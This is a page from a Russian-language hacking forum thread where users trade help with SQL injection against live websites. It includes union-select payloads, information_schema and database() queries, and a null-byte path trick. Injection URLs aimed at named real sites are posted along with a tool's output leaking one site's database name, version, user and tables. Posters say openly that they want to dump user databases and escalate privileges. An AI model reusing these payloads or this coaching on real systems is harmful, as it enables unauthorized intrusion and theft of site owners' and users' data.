Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А какже префикс .php ?
    И в phpBB папка /forum/images/avatars/ пуста, значит аватары скорее всего в БД = (
     
  2. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Ну в таком случае тебе не повезло.
    А если все же в папке,то как то так: ../path_to_avata.gif%00
     
  3. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А точно в /images/avatars/ должны авы лежать?
    Листинг каталогов открыт
     
  4. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
    и вот еще такой пример инъекции нашел
    ?id=14+and+0+union+select+1,2,3,4,5,6,7,8
    как ее понимать??
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Если подобрал поля, но ни одно из них не выводится, вероятно всего - это именно тот случай. После подстановки "-", "and 1=0" все должно заработать.
     
    1 person likes this.
  6. Серёжа393

    Joined:
    28 Dec 2009
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?
     
  7. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    concat_ws(0x3a,table_schema,table_name,column_name)
     
  8. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    union select 1,2,database(),4,5
    3 - выводимая колонка.
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    Если через тулзу:
    
    http://www.akos-icco.ru/news.php?part=1+or+1=1+and+substring(version(),1,1)=4--+
    
    database(): w_akos
    version(): 4.1.20-1.gms
    @@version_compile_os: pc-linux-gnu
    user(): w_akos@195.42.160.50
    
    Post-метод, настройки:
    
    $bl_url = "http://www.akos-icco.ru/news.php?part=1+or+1=1"; 
    $bl_filtr = "--+";
    $bl_plus = "+"; 
    $bl_error = "8 декабря 2008";
    $bl_error_type = 1; 
    
    Скрипт сохранить в ANSI-формате
    
       Brute tables
       -------------
      members
      subscribe
      news
      articles
    
    Дальше сам
    
     
    #11109 Pashkela, 18 Jan 2010
    Last edited: 18 Jan 2010
    1 person likes this.
  10. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    В поис вставляем галочку site/list.aspx?q=' Получаем:

    Server Error in '/' Application.
    Invalid operator for data type. Operator equals modulo, type equals varchar.
    Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

    Exception Details: System.Data.SqlClient.SqlException: Invalid operator for data type. Operator equals modulo, type equals varchar.

    Source Error:

    Line 94: paramCollection.Add(new SqlParameter("@Keywords", keywords));
    Line 95: paramCollection.Add(new SqlParameter("@StatusId", statusId));
    Line 96: DataTable dt = Sql.ExecuteQuery("dt", "spCourse_Search", paramCollection);
    Line 97: return dt;
    Line 98: }


    Source File: d:\websites\LocalUser\modernsalonlearningc\App_Code\Course.cs Line: 96

    Stack Trace:
    Дальше лабудень непонятная. Это что значит? уязвимость? Можно базу собрать? Просто с sql не знаком, если скажете что можно - буду читать, учить, пробовать. Очень база с сайта нужна.
     
  11. Анжелика

    Анжелика Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    25
    Likes Received:
    36
    Reputations:
    -4
    Ошибка в типах. Это не инъекция
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    При таком запросе ты узнаешь текущую версию БД, а челу надо узнать БД, в которой находится таблица. Делается это так:
    Code:
    SELECT table_schema FROM information_schema.tables WHERE table_name = 'твоя_таблица'
    Если кавычки экранируются, переводи либо в HEX либо в CHAR.
     
  13. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,076
    Likes Received:
    702
    Reputations:
    227
    Здравствуйте.
    Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
    М что означает
    ?
    Спасибо.
     
    #11113 mff, 18 Jan 2010
    Last edited: 18 Jan 2010
  14. [NiGHT]DarkAngel

    [NiGHT]DarkAngel Elder - Старейшина

    Joined:
    29 Mar 2005
    Messages:
    131
    Likes Received:
    40
    Reputations:
    16
    Да это sql-injection в SQL операторе LIMIT
     
    1 person likes this.
  15. Alf0x0ns

    Alf0x0ns Member

    Joined:
    12 Jan 2010
    Messages:
    14
    Likes Received:
    5
    Reputations:
    1
    для mff:
    http://www.etiket-shop.ru/pages.php?Page=65&nID=-132'+union+select+1,2,3,@@version,5--+
     
    #11115 Alf0x0ns, 18 Jan 2010
    Last edited: 18 Jan 2010
    1 person likes this.
  16. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Limit стоит после order by. Потому если file_priv N, то ничего не сделаешь. Второй вариант, как уже описали выше, найти другую скулю :)
    что-то я обкурился :)
     
    2 people like this.
  17. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,076
    Likes Received:
    702
    Reputations:
    227
    Спасибо ребят! Как бы теперь узнать табличку в юзерами? Нужно базу потянуть :)
     
  18. Alf0x0ns

    Alf0x0ns Member

    Joined:
    12 Jan 2010
    Messages:
    14
    Likes Received:
    5
    Reputations:
    1
    версия Mysql ниже 5, а точней 4.0.26-log
    Вариант перебор таблиц и полей!
     
  19. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,076
    Likes Received:
    702
    Reputations:
    227
    Alf0x0ns, ага, уже перебирал. Может кто словариком задобрит?
     
  20. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    Как повысить привилегии юзера в бд?
    Например, есть юзер с ником user, PRIVILEGE_TYPE: USAGE.
    Как добавить привилегии, пробивал через инсерт:
    Code:
    INSERT INTO 'USER_PRIVILEGES' VALUES('tracker'@'localhost',null,UPDATE,YES);
    Подскажите где ошибка в синтаксисе?

    спасибо v1d0qz.
     
    #11120 wkar, 19 Jan 2010
    Last edited: 19 Jan 2010
Loading...
Thread Status:
Not open for further replies.